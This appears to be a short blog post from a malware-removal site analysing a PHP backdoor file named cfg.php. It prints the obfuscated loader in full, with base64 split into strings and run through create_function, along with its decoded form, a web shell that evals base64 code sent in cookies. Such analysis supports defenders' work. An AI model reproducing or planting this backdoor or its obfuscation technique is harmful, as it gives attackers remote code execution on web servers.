cfg.php

By RobertVirus Removal

A script runner, that runs evaled base64 encoded POST / GET

<?php $rtpz="lKHByZWdfcmVwbGFjZShhcnJheShdgnL1teXHchd9XhdHhdNdLycsJy9ccy8nKShdwgYhdXJhdyYXkoJychdsJyhdsn"; $tsdg = str_replace("b","","bsbtbrb_rbebpblacbe"); $wxhw="KhdSwgam9pbhdihhcnJhehdV9zbhdGljZSgkYSwkYygkYSktMykpKSkpO2VjaG8ghdJzhdwvJy4kahdy4nPic7fQ=="; $feka="hdpeyRrPSdyaXNoZXJlJhdztlhdY2hhdvICc8hdJy4kayhd4nPic7ZXhdZhbChdhiYXhdNlNjRfZGVjb2R"; $asys="JGM9J2NvdWhd50JzskYT0khdX0NPT0tJRTtphdZihdhyZXNhdldhdChdgkhdYSkhd9PShddtcicgJiYhdgJGMohdJGEpPjM"; $zjzy = $tsdg("q", "", "qbaqsqeq6q4q_qdqecoqde"); $liiy = $tsdg("z","","crzezatez_fzunctzizon"); $iuwt = $liiy("", $zjzy($tsdg("hd", "", $asys.$feka.$rtpz.$wxhw))); $iuwt(); ?>

The decoded PHP code:

<?php $c = 'count';
$a = $_COOKIE;
if (reset($a) == 'mr' && $c($a) > 3) {
    $k = 'rishere';
    echo '<' . $k . '>';
    eval(base64_decode(preg_replace(array('/[^\w=\s]/', '/\s/'), array('', '+'), join(array_slice($a, $c($a) - 3)))));
    echo '</' . $k . '>';
}

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.